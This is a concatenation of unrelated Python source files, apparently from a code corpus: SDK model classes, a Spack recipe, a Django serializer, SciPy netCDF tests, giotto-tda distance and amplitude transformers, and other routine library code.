:param face_detail: The face_detail of this ImageDetectionResultDetailPolitics.
:type: ImageDetectionResultDetailFaceDetail
"""
self._face_detail = face_detail
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ImageDetectionResultDetailPolitics):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
py | 1a305242a09f192c3cb9515271fa7ceb5357e232 | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RTfmpvalue(RPackage):
"""In putative Transcription Factor Binding Sites (TFBSs) identification
from sequence/alignments, we are interested in the significance of
certain match score. TFMPvalue provides the accurate calculation of
P-value with score threshold for Position Weight Matrices, or the score
with given P-value. This package is an interface to code originally
made available by Helene Touzet and Jean-Stephane Varre, 2007,
Algorithms Mol Biol:2, 15."""
homepage = "https://github.com/ge11232002/TFMPvalue"
url = "https://cran.rstudio.com/src/contrib/TFMPvalue_0.0.6.tar.gz"
list_url = "https://cran.rstudio.com/src/contrib/Archive/TFMPvalue"
version('0.0.6', '69fdf4f9b9a0f408a5cee9ce34bea261')
depends_on('[email protected]:', type=('build', 'run'))
|
py | 1a30537e7480b0064fca0d62c9bb729f31c21ef4 | https://forms.gle/3jisA75mp56U2F4L6
https://docs.google.com/spreadsheets/d/e/2PACX-1vTUSn1L4ChdUQeJSx2ufan1h9AhHzKEqPwBZwYmigstcfylLoxdn50Ndz_SF1cSwKFAD9Pw1rPEfo6t/pubhtml |
py | 1a3053a65b79a4453d2e85f91bf7be515d587ce4 | """ Contact serializers. """
# Django REST Framework
from rest_framework import serializers
# Models
from coeadmin.record.models.person import Person
from coeadmin.record.models.contact import Contact
# Serializers
from coeadmin.record.serializers.person import PersonModelSerializer
# Utilities
from datetime import datetime, timedelta
class ContactModelSerializer(serializers.ModelSerializer):
""" Contact serializer. """
person = PersonModelSerializer(allow_null=True)
class Meta:
""" Meta class. """
model = Contact
fields = (
'id',
'person',
'contact_date',
'contact_type',
'insolation_days',
'high_insulation_date',
'is_active',
)
read_only_fields = (
'id',
'person'
)
class AddContactSerializer(serializers.ModelSerializer):
""" Add contact serializer. """
class Meta:
""" Meta class. """
model = Contact
fields = (
'id',
'person',
'contact_date',
'contact_type',
'insolation_days',
'high_insulation_date',
'is_active',
)
def create(self, validate_data):
""" Create the contact. """
positive = self.context['positive']
person = validate_data['person']
days = validate_data['insolation_days']
        contact_date = validate_data['contact_date']
        contact = Contact.objects.create(
            positive=positive,
            person=person,
            contact_date=contact_date,
            contact_type=validate_data['contact_type'],
            insolation_days=days,
            high_insulation_date=contact_date + timedelta(days=days),
)
return contact |
py | 1a3053bf5ebef03ef1571f606882f58543820372 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The command group for cloud dataproc operations."""
from googlecloudsdk.calliope import base
class Operations(base.Group):
"""View and manage Google Cloud Dataproc operations."""
detailed_help = {
'DESCRIPTION': '{description}',
'EXAMPLES': """\
To cancel an active operation, run:
$ {command} cancel operation_id
To view the details of an operation, run:
$ {command} describe operation_id
To see the list of all operations, run:
$ {command} list
To delete the record of an inactive operation, run:
$ {command} delete operation_id
""",
}
|
py | 1a3053e21bd3e36feaff15231bc4c71fec1fef21 | ''' Tests for netcdf '''
from __future__ import division, print_function, absolute_import
import os
from os.path import join as pjoin, dirname
import shutil
import tempfile
import warnings
from io import BytesIO
from glob import glob
from contextlib import contextmanager
import numpy as np
from numpy.testing import (assert_, assert_allclose, assert_raises,
assert_equal, run_module_suite)
from scipy.io.netcdf import netcdf_file
from scipy._lib._tmpdirs import in_tempdir
TEST_DATA_PATH = pjoin(dirname(__file__), 'data')
N_EG_ELS = 11 # number of elements for example variable
VARTYPE_EG = 'b' # var type for example variable
@contextmanager
def make_simple(*args, **kwargs):
f = netcdf_file(*args, **kwargs)
f.history = 'Created for a test'
f.createDimension('time', N_EG_ELS)
time = f.createVariable('time', VARTYPE_EG, ('time',))
time[:] = np.arange(N_EG_ELS)
time.units = 'days since 2008-01-01'
f.flush()
yield f
f.close()
def check_simple(ncfileobj):
'''Example fileobj tests '''
assert_equal(ncfileobj.history, b'Created for a test')
time = ncfileobj.variables['time']
assert_equal(time.units, b'days since 2008-01-01')
assert_equal(time.shape, (N_EG_ELS,))
assert_equal(time[-1], N_EG_ELS-1)
def assert_mask_matches(arr, expected_mask):
'''
Asserts that the mask of arr is effectively the same as expected_mask.
In contrast to numpy.ma.testutils.assert_mask_equal, this function allows
testing the 'mask' of a standard numpy array (the mask in this case is treated
as all False).
Parameters
----------
arr: ndarray or MaskedArray
Array to test.
expected_mask: array_like of booleans
A list giving the expected mask.
'''
mask = np.ma.getmaskarray(arr)
assert_equal(mask, expected_mask)
def test_read_write_files():
# test round trip for example file
cwd = os.getcwd()
try:
tmpdir = tempfile.mkdtemp()
os.chdir(tmpdir)
with make_simple('simple.nc', 'w') as f:
pass
# read the file we just created in 'a' mode
with netcdf_file('simple.nc', 'a') as f:
check_simple(f)
# add something
f._attributes['appendRan'] = 1
# To read the NetCDF file we just created::
with netcdf_file('simple.nc') as f:
# Using mmap is the default
assert_(f.use_mmap)
check_simple(f)
assert_equal(f._attributes['appendRan'], 1)
# Read it in append (and check mmap is off)
with netcdf_file('simple.nc', 'a') as f:
assert_(not f.use_mmap)
check_simple(f)
assert_equal(f._attributes['appendRan'], 1)
# Now without mmap
with netcdf_file('simple.nc', mmap=False) as f:
# Using mmap is the default
assert_(not f.use_mmap)
check_simple(f)
# To read the NetCDF file we just created, as file object, no
# mmap. When n * n_bytes(var_type) is not divisible by 4, this
# raised an error in pupynere 1.0.12 and scipy rev 5893, because
# calculated vsize was rounding up in units of 4 - see
# http://www.unidata.ucar.edu/software/netcdf/docs/netcdf.html
with open('simple.nc', 'rb') as fobj:
with netcdf_file(fobj) as f:
# by default, don't use mmap for file-like
assert_(not f.use_mmap)
check_simple(f)
# Read file from fileobj, with mmap
with open('simple.nc', 'rb') as fobj:
with netcdf_file(fobj, mmap=True) as f:
assert_(f.use_mmap)
check_simple(f)
# Again read it in append mode (adding another att)
with open('simple.nc', 'r+b') as fobj:
with netcdf_file(fobj, 'a') as f:
assert_(not f.use_mmap)
check_simple(f)
f.createDimension('app_dim', 1)
var = f.createVariable('app_var', 'i', ('app_dim',))
var[:] = 42
# And... check that app_var made it in...
with netcdf_file('simple.nc') as f:
check_simple(f)
assert_equal(f.variables['app_var'][:], 42)
except:
os.chdir(cwd)
shutil.rmtree(tmpdir)
raise
os.chdir(cwd)
shutil.rmtree(tmpdir)
def test_read_write_sio():
eg_sio1 = BytesIO()
with make_simple(eg_sio1, 'w') as f1:
str_val = eg_sio1.getvalue()
eg_sio2 = BytesIO(str_val)
with netcdf_file(eg_sio2) as f2:
check_simple(f2)
# Test that error is raised if attempting mmap for sio
eg_sio3 = BytesIO(str_val)
assert_raises(ValueError, netcdf_file, eg_sio3, 'r', True)
# Test 64-bit offset write / read
eg_sio_64 = BytesIO()
with make_simple(eg_sio_64, 'w', version=2) as f_64:
str_val = eg_sio_64.getvalue()
eg_sio_64 = BytesIO(str_val)
with netcdf_file(eg_sio_64) as f_64:
check_simple(f_64)
assert_equal(f_64.version_byte, 2)
# also when version 2 explicitly specified
eg_sio_64 = BytesIO(str_val)
with netcdf_file(eg_sio_64, version=2) as f_64:
check_simple(f_64)
assert_equal(f_64.version_byte, 2)
def test_read_example_data():
# read any example data files
for fname in glob(pjoin(TEST_DATA_PATH, '*.nc')):
with netcdf_file(fname, 'r') as f:
pass
with netcdf_file(fname, 'r', mmap=False) as f:
pass
def test_itemset_no_segfault_on_readonly():
# Regression test for ticket #1202.
# Open the test file in read-only mode.
with warnings.catch_warnings():
warnings.simplefilter("ignore")
filename = pjoin(TEST_DATA_PATH, 'example_1.nc')
with netcdf_file(filename, 'r') as f:
time_var = f.variables['time']
# time_var.assignValue(42) should raise a RuntimeError--not seg. fault!
assert_raises(RuntimeError, time_var.assignValue, 42)
def test_write_invalid_dtype():
dtypes = ['int64', 'uint64']
if np.dtype('int').itemsize == 8: # 64-bit machines
dtypes.append('int')
if np.dtype('uint').itemsize == 8: # 64-bit machines
dtypes.append('uint')
with netcdf_file(BytesIO(), 'w') as f:
f.createDimension('time', N_EG_ELS)
for dt in dtypes:
assert_raises(ValueError, f.createVariable, 'time', dt, ('time',))
def test_flush_rewind():
stream = BytesIO()
with make_simple(stream, mode='w') as f:
x = f.createDimension('x',4)
v = f.createVariable('v', 'i2', ['x'])
v[:] = 1
f.flush()
len_single = len(stream.getvalue())
f.flush()
len_double = len(stream.getvalue())
assert_(len_single == len_double)
def test_dtype_specifiers():
# Numpy 1.7.0-dev had a bug where 'i2' wouldn't work.
# Specifying np.int16 or similar only works from the same commit as this
# comment was made.
with make_simple(BytesIO(), mode='w') as f:
f.createDimension('x',4)
f.createVariable('v1', 'i2', ['x'])
f.createVariable('v2', np.int16, ['x'])
f.createVariable('v3', np.dtype(np.int16), ['x'])
def test_ticket_1720():
io = BytesIO()
items = [0,0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]
with netcdf_file(io, 'w') as f:
f.history = 'Created for a test'
f.createDimension('float_var', 10)
float_var = f.createVariable('float_var', 'f', ('float_var',))
float_var[:] = items
float_var.units = 'metres'
f.flush()
contents = io.getvalue()
io = BytesIO(contents)
with netcdf_file(io, 'r') as f:
assert_equal(f.history, b'Created for a test')
float_var = f.variables['float_var']
assert_equal(float_var.units, b'metres')
assert_equal(float_var.shape, (10,))
assert_allclose(float_var[:], items)
def test_mmaps_segfault():
filename = pjoin(TEST_DATA_PATH, 'example_1.nc')
with warnings.catch_warnings():
warnings.simplefilter("error")
with netcdf_file(filename, mmap=True) as f:
x = f.variables['lat'][:]
# should not raise warnings
del x
def doit():
with netcdf_file(filename, mmap=True) as f:
return f.variables['lat'][:]
# should not crash
with warnings.catch_warnings():
warnings.simplefilter("ignore")
x = doit()
x.sum()
def test_zero_dimensional_var():
io = BytesIO()
with make_simple(io, 'w') as f:
v = f.createVariable('zerodim', 'i2', [])
# This is checking that .isrec returns a boolean - don't simplify it
# to 'assert not ...'
assert v.isrec is False, v.isrec
f.flush()
def test_byte_gatts():
# Check that global "string" atts work like they did before py3k
# unicode and general bytes confusion
with in_tempdir():
filename = 'g_byte_atts.nc'
f = netcdf_file(filename, 'w')
f._attributes['holy'] = b'grail'
f._attributes['witch'] = 'floats'
f.close()
f = netcdf_file(filename, 'r')
assert_equal(f._attributes['holy'], b'grail')
assert_equal(f._attributes['witch'], b'floats')
f.close()
def test_open_append():
# open 'w' put one attr
with in_tempdir():
filename = 'append_dat.nc'
f = netcdf_file(filename, 'w')
f._attributes['Kilroy'] = 'was here'
f.close()
# open again in 'a', read the att and and a new one
f = netcdf_file(filename, 'a')
assert_equal(f._attributes['Kilroy'], b'was here')
f._attributes['naughty'] = b'Zoot'
f.close()
# open yet again in 'r' and check both atts
f = netcdf_file(filename, 'r')
assert_equal(f._attributes['Kilroy'], b'was here')
assert_equal(f._attributes['naughty'], b'Zoot')
f.close()
def test_append_recordDimension():
dataSize = 100
with in_tempdir():
# Create file with record time dimension
with netcdf_file('withRecordDimension.nc', 'w') as f:
f.createDimension('time', None)
f.createVariable('time', 'd', ('time',))
f.createDimension('x', dataSize)
x = f.createVariable('x', 'd', ('x',))
x[:] = np.array(range(dataSize))
f.createDimension('y', dataSize)
y = f.createVariable('y', 'd', ('y',))
y[:] = np.array(range(dataSize))
f.createVariable('testData', 'i', ('time', 'x', 'y'))
f.flush()
f.close()
for i in range(2):
# Open the file in append mode and add data
with netcdf_file('withRecordDimension.nc', 'a') as f:
f.variables['time'].data = np.append(f.variables["time"].data, i)
f.variables['testData'][i, :, :] = np.ones((dataSize, dataSize))*i
f.flush()
# Read the file and check that append worked
with netcdf_file('withRecordDimension.nc') as f:
assert_equal(f.variables['time'][-1], i)
assert_equal(f.variables['testData'][-1, :, :].copy(), np.ones((dataSize, dataSize))*i)
assert_equal(f.variables['time'].data.shape[0], i+1)
assert_equal(f.variables['testData'].data.shape[0], i+1)
# Read the file and check that 'data' was not saved as user defined
# attribute of testData variable during append operation
with netcdf_file('withRecordDimension.nc') as f:
with assert_raises(KeyError) as ar:
f.variables['testData']._attributes['data']
ex = ar.exception
assert_equal(ex.args[0], 'data')
def test_maskandscale():
t = np.linspace(20, 30, 15)
t[3] = 100
tm = np.ma.masked_greater(t, 99)
fname = pjoin(TEST_DATA_PATH, 'example_2.nc')
with netcdf_file(fname, maskandscale=True) as f:
Temp = f.variables['Temperature']
assert_equal(Temp.missing_value, 9999)
assert_equal(Temp.add_offset, 20)
assert_equal(Temp.scale_factor, np.float32(0.01))
found = Temp[:].compressed()
del Temp # Remove ref to mmap, so file can be closed.
expected = np.round(tm.compressed(), 2)
assert_allclose(found, expected)
with in_tempdir():
newfname = 'ms.nc'
f = netcdf_file(newfname, 'w', maskandscale=True)
f.createDimension('Temperature', len(tm))
temp = f.createVariable('Temperature', 'i', ('Temperature',))
temp.missing_value = 9999
temp.scale_factor = 0.01
temp.add_offset = 20
temp[:] = tm
f.close()
with netcdf_file(newfname, maskandscale=True) as f:
Temp = f.variables['Temperature']
assert_equal(Temp.missing_value, 9999)
assert_equal(Temp.add_offset, 20)
assert_equal(Temp.scale_factor, np.float32(0.01))
expected = np.round(tm.compressed(), 2)
found = Temp[:].compressed()
del Temp
assert_allclose(found, expected)
# ------------------------------------------------------------------------
# Test reading with masked values (_FillValue / missing_value)
# ------------------------------------------------------------------------
def test_read_withValuesNearFillValue():
# Regression test for ticket #5626
fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')
with netcdf_file(fname, maskandscale=True) as f:
vardata = f.variables['var1_fillval0'][:]
assert_mask_matches(vardata, [False, True, False])
def test_read_withNoFillValue():
# For a variable with no fill value, reading data with maskandscale=True
# should return unmasked data
fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')
with netcdf_file(fname, maskandscale=True) as f:
vardata = f.variables['var2_noFillval'][:]
assert_mask_matches(vardata, [False, False, False])
assert_equal(vardata, [1,2,3])
def test_read_withFillValueAndMissingValue():
# For a variable with both _FillValue and missing_value, the _FillValue
# should be used
IRRELEVANT_VALUE = 9999
fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')
with netcdf_file(fname, maskandscale=True) as f:
vardata = f.variables['var3_fillvalAndMissingValue'][:]
assert_mask_matches(vardata, [True, False, False])
assert_equal(vardata, [IRRELEVANT_VALUE, 2, 3])
def test_read_withMissingValue():
# For a variable with missing_value but not _FillValue, the missing_value
# should be used
fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')
with netcdf_file(fname, maskandscale=True) as f:
vardata = f.variables['var4_missingValue'][:]
assert_mask_matches(vardata, [False, True, False])
def test_read_withFillValNaN():
fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')
with netcdf_file(fname, maskandscale=True) as f:
vardata = f.variables['var5_fillvalNaN'][:]
assert_mask_matches(vardata, [False, True, False])
def test_read_withChar():
fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')
with netcdf_file(fname, maskandscale=True) as f:
vardata = f.variables['var6_char'][:]
assert_mask_matches(vardata, [False, True, False])
def test_read_with2dVar():
fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')
with netcdf_file(fname, maskandscale=True) as f:
vardata = f.variables['var7_2d'][:]
assert_mask_matches(vardata, [[True, False], [False, False], [False, True]])
def test_read_withMaskAndScaleFalse():
# If a variable has a _FillValue (or missing_value) attribute, but is read
# with maskandscale set to False, the result should be unmasked
fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')
# Open file with mmap=False to avoid problems with closing a mmap'ed file
# when arrays referring to its data still exist:
with netcdf_file(fname, maskandscale=False, mmap=False) as f:
vardata = f.variables['var3_fillvalAndMissingValue'][:]
assert_mask_matches(vardata, [False, False, False])
assert_equal(vardata, [1, 2, 3])
if __name__ == "__main__":
run_module_suite()
|
py | 1a305550a608959717cee6136d21d1063fef06a4 | # License: Apache 2.0
import numpy as np
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.utils.validation import check_is_fitted
from ._metrics import _parallel_pairwise, _parallel_amplitude
from ._utils import _discretize
from ..utils.validation import check_diagram, validate_params, \
validate_metric_params
class PairwiseDistance(BaseEstimator, TransformerMixin):
"""`Distances <https://www.giotto.ai/theory>`_ between pairs of persistence
diagrams, constructed from the distances between their respective
subdiagrams with constant homology dimension.
Given two collections of persistence diagrams consisting of
birth-death-dimension triples [b, d, q], a collection of distance
matrices or a single distance matrix between pairs of diagrams is
calculated according to the following steps:
1. All diagrams are partitioned into subdiagrams corresponding to
distinct homology dimensions.
2. Pairwise distances between subdiagrams of equal homology
dimension are calculated according to the parameters `metric` and
`metric_params`. This gives a collection of distance matrices,
:math:`\\mathbf{D} = (D_{q_1}, \\ldots, D_{q_n})`.
3. The final result is either :math:`\\mathbf{D}` itself as a
three-dimensional array, or a single distance matrix constructed
by taking norms of the vectors of distances between diagram pairs.
Parameters
----------
metric : ``'bottleneck'`` | ``'wasserstein'`` | ``'landscape'`` | \
        ``'betti'`` | ``'heat'``, optional, default: ``'landscape'``
Distance or dissimilarity function between subdiagrams:
- ``'bottleneck'`` and ``'wasserstein'`` refer to the identically named
perfect-matching--based notions of distance.
- ``'landscape'`` refers to the :math:`L^p` distance between
persistence landscapes.
- ``'betti'`` refers to the :math:`L^p` distance between Betti curves.
- ``'heat'`` refers to the :math:`L^p` distance between
Gaussian-smoothed diagrams.
metric_params : dict or None, optional, default: ``None``
Additional keyword arguments for the metric function:
- If ``metric == 'bottleneck'`` the only argument is `delta` (float,
default: ``0.01``). When equal to ``0.``, an exact algorithm is
used; otherwise, a faster approximate algorithm is used.
- If ``metric == 'wasserstein'`` the available arguments are `p`
(int, default: ``2``) and `delta` (float, default: ``0.01``).
Unlike the case of ``'bottleneck'``, `delta` cannot be set to
``0.`` and an exact algorithm is not available.
- If ``metric == 'betti'`` the available arguments are `p` (float,
default: ``2.``) and `n_values` (int, default: ``100``).
- If ``metric == 'landscape'`` the available arguments are `p`
(float, default: ``2.``), `n_values` (int, default: ``100``) and
`n_layers` (int, default: ``1``).
- If ``metric == 'heat'`` the available arguments are `p`
(float, default: ``2.``), `sigma` (float, default: ``1.``) and
`n_values` (int, default: ``100``).
order : float or None, optional, default: ``2.``
If ``None``, :meth:`transform` returns for each pair of diagrams a
vector of distances corresponding to the dimensions in
:attr:`homology_dimensions_`. Otherwise, the :math:`p`-norm of
these vectors with :math:`p` equal to `order` is taken.
n_jobs : int or None, optional, default: ``None``
The number of jobs to use for the computation. ``None`` means 1 unless
in a :obj:`joblib.parallel_backend` context. ``-1`` means using all
processors.
Attributes
----------
effective_metric_params_ : dict
Dictionary containing all information present in `metric_params` as
well as on any relevant quantities computed in :meth:`fit`.
homology_dimensions_ : list
Homology dimensions seen in :meth:`fit`, sorted in ascending order.
See also
--------
Amplitude, BettiCurve, PersistenceLandscape, HeatKernel, \
giotto.homology.VietorisRipsPersistence
Notes
-----
To compute distances without first splitting the computation between
different homology dimensions, data should be first transformed by an
instance of :class:`ForgetDimension`.
`Hera <https://bitbucket.org/grey_narn/hera>`_ is used as a C++ backend
for computing bottleneck and Wasserstein distances between persistence
diagrams.
"""
_hyperparameters = {'order': [float, (1, np.inf)]}
def __init__(self, metric='landscape', metric_params=None, order=2.,
n_jobs=None):
self.metric = metric
self.metric_params = metric_params
self.order = order
self.n_jobs = n_jobs
def fit(self, X, y=None):
"""Store all observed homology dimensions in
:attr:`homology_dimensions_` and compute
        :attr:`effective_metric_params_`. Then, return the estimator.
This method is there to implement the usual scikit-learn API and hence
work in pipelines.
Parameters
----------
X : ndarray, shape (n_samples_fit, n_features, 3)
Input data. Array of persistence diagrams, each a collection of
triples [b, d, q] representing persistent topological features
through their birth (b), death (d) and homology dimension (q).
y : None
There is no need for a target in a transformer, yet the pipeline
API requires this parameter.
Returns
-------
self : object
"""
X = check_diagram(X)
if self.metric_params is None:
self.effective_metric_params_ = {}
else:
self.effective_metric_params_ = self.metric_params.copy()
hyperparameters = self.get_params().copy()
if self.order is not None:
if isinstance(self.order, int):
hyperparameters['order'] = float(self.order)
else:
hyperparameters['order'] = 1. # Automatically pass validate_params
validate_params(hyperparameters, self._hyperparameters)
validate_metric_params(self.metric, self.effective_metric_params_)
self.homology_dimensions_ = sorted(set(X[0, :, 2]))
if self.metric in ['landscape', 'heat', 'betti']:
self.effective_metric_params_['samplings'], \
self.effective_metric_params_['step_sizes'] = \
_discretize(X, **self.effective_metric_params_)
self._X = X
return self
def transform(self, X, y=None):
"""Computes a distance or vector of distances between the diagrams in
`X` and the diagrams seen in :meth:`fit`.
Parameters
----------
X : ndarray, shape (n_samples, n_features, 3)
Input data. Array of persistence diagrams, each a collection of
triples [b, d, q] representing persistent topological features
through their birth (b), death (d) and homology dimension (q).
y : None
There is no need for a target in a transformer, yet the pipeline
API requires this parameter.
Returns
-------
Xt : ndarray, shape (n_samples_fit, n_samples, n_homology_dimensions) \
if `order` is ``None``, else (n_samples_fit, n_samples)
Distance matrix or collection of distance matrices between
diagrams in `X` and diagrams seen in :meth:`fit`. In the
second case, index i along axis 2 corresponds to the i-th
homology dimension in :attr:`homology_dimensions_`.
"""
check_is_fitted(self, ['effective_metric_params_',
'homology_dimensions_'])
X = check_diagram(X)
if np.array_equal(X, self._X):
X2 = None
else:
X2 = X
Xt = _parallel_pairwise(self._X, X2, self.metric,
self.effective_metric_params_,
self.homology_dimensions_,
self.n_jobs)
if self.order is not None:
Xt = np.linalg.norm(Xt, axis=2, ord=self.order)
return Xt
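# ---------------------------------------------------------------------------
# Hypothetical usage sketch (not part of the original module). It assumes
# `X_train` and `X_test` are ndarrays of persistence diagrams with shape
# (n_samples, n_features, 3), as described in the docstring above.
#
#     pd = PairwiseDistance(metric='wasserstein',
#                           metric_params={'p': 2, 'delta': 0.01},
#                           order=2., n_jobs=-1)
#     pd.fit(X_train)
#     D = pd.transform(X_test)  # shape (n_samples_fit, n_samples) since order is not None
# ---------------------------------------------------------------------------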
class Amplitude(BaseEstimator, TransformerMixin):
"""`Amplitudes <https://www.giotto.ai/theory>`_ of persistence diagrams,
constructed from the amplitudes of their subdiagrams with constant
homology dimension.
Given a single persistence diagram consisting of birth-death-dimension
triples [b, d, q], a vector of amplitudes or a single scalar amplitude is
calculated according to the following steps:
1. All diagrams are partitioned into subdiagrams corresponding to
distinct homology dimensions.
2. The amplitude of each subdiagram is calculated according to the
parameters `metric` and `metric_params`. This gives a vector of
amplitudes, :math:`\\mathbf{a} = (a_{q_1}, \\ldots, a_{q_n})`.
3. The final result is either :math:`\\mathbf{a}` itself or
a norm of :math:`\\mathbf{a}`.
Parameters
----------
metric : ``'bottleneck'`` | ``'wasserstein'`` | ``'landscape'`` | \
``'betti'`` | ``'heat'``, optional, default: ``'bottleneck'``
Distance or dissimilarity function used to define the amplitude of
a subdiagram as its distance from the diagonal diagram:
- ``'bottleneck'`` and ``'wasserstein'`` refer to the identically named
perfect-matching--based notions of distance.
- ``'landscape'`` refers to the :math:`L^p` distance between
persistence landscapes.
- ``'betti'`` refers to the :math:`L^p` distance between Betti curves.
- ``'heat'`` refers to the :math:`L^p` distance between
Gaussian-smoothed diagrams.
metric_params : dict or None, optional, default: ``None``
Additional keyword arguments for the metric function:
- If ``metric == 'bottleneck'`` there are no available arguments.
- If ``metric == 'wasserstein'`` the only argument is `p` (int,
default: ``2``).
- If ``metric == 'betti'`` the available arguments are `p` (float,
default: ``2.``) and `n_values` (int, default: ``100``).
- If ``metric == 'landscape'`` the available arguments are `p`
(float, default: ``2.``), `n_values` (int, default: ``100``) and
`n_layers` (int, default: ``1``).
- If ``metric == 'heat'`` the available arguments are `p` (float,
default: ``2.``), `sigma` (float, default: ``1.``) and `n_values`
(int, default: ``100``).
order : float or None, optional, default: ``2.``
If ``None``, :meth:`transform` returns for each diagram a vector of
amplitudes corresponding to the dimensions in
:attr:`homology_dimensions_`. Otherwise, the :math:`p`-norm of
these vectors with :math:`p` equal to `order` is taken.
n_jobs : int or None, optional, default: ``None``
The number of jobs to use for the computation. ``None`` means 1 unless
in a :obj:`joblib.parallel_backend` context. ``-1`` means using all
processors.
Attributes
----------
effective_metric_params_ : dict
Dictionary containing all information present in `metric_params` as
well as on any relevant quantities computed in :meth:`fit`.
homology_dimensions_ : list
Homology dimensions seen in :meth:`fit`, sorted in ascending order.
See also
--------
PairwiseDistance, Scaler, Filtering, \
BettiCurve, PersistenceLandscape, \
HeatKernel, giotto.homology.VietorisRipsPersistence
Notes
-----
To compute amplitudes without first splitting the computation between
different homology dimensions, data should be first transformed by an
instance of :class:`ForgetDimension`.
"""
_hyperparameters = {'order': [float, (1, np.inf)]}
def __init__(self, metric='landscape', metric_params=None, order=2.,
n_jobs=None):
self.metric = metric
self.metric_params = metric_params
self.order = order
self.n_jobs = n_jobs
def fit(self, X, y=None):
"""Store all observed homology dimensions in
:attr:`homology_dimensions_` and compute
        :attr:`effective_metric_params_`. Then, return the estimator.
This method is there to implement the usual scikit-learn API and hence
work in pipelines.
Parameters
----------
X : ndarray, shape (n_samples, n_features, 3)
Input data. Array of persistence diagrams, each a collection of
triples [b, d, q] representing persistent topological features
through their birth (b), death (d) and homology dimension (q).
y : None
There is no need for a target in a transformer, yet the pipeline
API requires this parameter.
Returns
-------
self : object
"""
if self.metric_params is None:
self.effective_metric_params_ = {}
else:
self.effective_metric_params_ = self.metric_params.copy()
hyperparameters = self.get_params().copy()
if self.order is not None:
if isinstance(self.order, int):
hyperparameters['order'] = float(self.order)
else:
hyperparameters['order'] = 1. # Automatically pass validate_params
validate_params(hyperparameters, self._hyperparameters)
validate_metric_params(self.metric, self.effective_metric_params_)
X = check_diagram(X)
self.homology_dimensions_ = sorted(set(X[0, :, 2]))
if self.metric in ['landscape', 'heat', 'betti']:
self.effective_metric_params_['samplings'], \
self.effective_metric_params_['step_sizes'] = \
_discretize(X, **self.effective_metric_params_)
return self
def transform(self, X, y=None):
"""Compute the amplitudes or amplitude vectors of diagrams in `X`.
Parameters
----------
X : ndarray, shape (n_samples, n_features, 3)
Input data. Array of persistence diagrams, each a collection of
triples [b, d, q] representing persistent topological features
through their birth (b), death (d) and homology dimension (q).
y : None
There is no need for a target in a transformer, yet the pipeline
API requires this parameter.
Returns
-------
Xt : ndarray, shape (n_samples, n_homology_dimensions) if `order` \
is ``None``, else (n_samples, 1)
Amplitudes or amplitude vectors of the diagrams in `X`. In the
second case, index i along axis 1 corresponds to the i-th
homology dimension in :attr:`homology_dimensions_`.
"""
check_is_fitted(self, ['effective_metric_params_',
'homology_dimensions_'])
X = check_diagram(X)
Xt = _parallel_amplitude(X, self.metric,
self.effective_metric_params_,
self.homology_dimensions_,
self.n_jobs)
if self.order is None:
return Xt
Xt = np.linalg.norm(Xt, axis=1, ord=self.order).reshape(-1, 1)
return Xt
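# ---------------------------------------------------------------------------
# Hypothetical usage sketch (not part of the original module). It assumes `X`
# is an ndarray of persistence diagrams with shape (n_samples, n_features, 3).
#
#     amp = Amplitude(metric='landscape',
#                     metric_params={'p': 2., 'n_values': 100, 'n_layers': 1},
#                     order=None, n_jobs=-1)
#     A = amp.fit_transform(X)  # shape (n_samples, n_homology_dimensions)
# ---------------------------------------------------------------------------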
|
py | 1a30555e91c7bf3a42ad1f0b9aaf106f7a2e35f7 | #!/usr/bin/env python3 -u
# -*- coding: utf-8 -*-
# copyright: sktime developers, BSD-3-Clause License (see LICENSE file)
"""Implement transformers for summarizing a time series."""
import warnings
from sktime.transformations.series.summarize import WindowSummarizer
__all__ = ["WindowSummarizer"]
warnings.warn(
"WindowSummarizer has been moved to transformations.series.summarize,"
+ " the old location in series.windows_summarize is deprecated since 0.11.0,"
+ " and will be removed in 0.12.0. Please use the import from "
+ "transformations.series.summarize import WindowSummarizer."
)
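# Recommended replacement import, as stated in the deprecation message above:
#
#     from sktime.transformations.series.summarize import WindowSummarizer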
|
py | 1a30557d6404dbdd5f998bc2c989ed340e1a804c | '''
Created on Oct 6, 2013 (from DialogPluginManager.py)
@author: Mark V Systems Limited
(c) Copyright 2013 Mark V Systems Limited, All rights reserved.
'''
from tkinter import simpledialog, Toplevel, font, messagebox, VERTICAL, HORIZONTAL, N, S, E, W
from tkinter.constants import DISABLED, ACTIVE
try:
from tkinter.ttk import Treeview, Scrollbar, Frame, Label, Button
except ImportError:
from ttk import Treeview, Scrollbar, Frame, Label, Button
from arelle import PackageManager, DialogURL
from arelle.CntlrWinTooltip import ToolTip
import os, time
try:
import regex as re
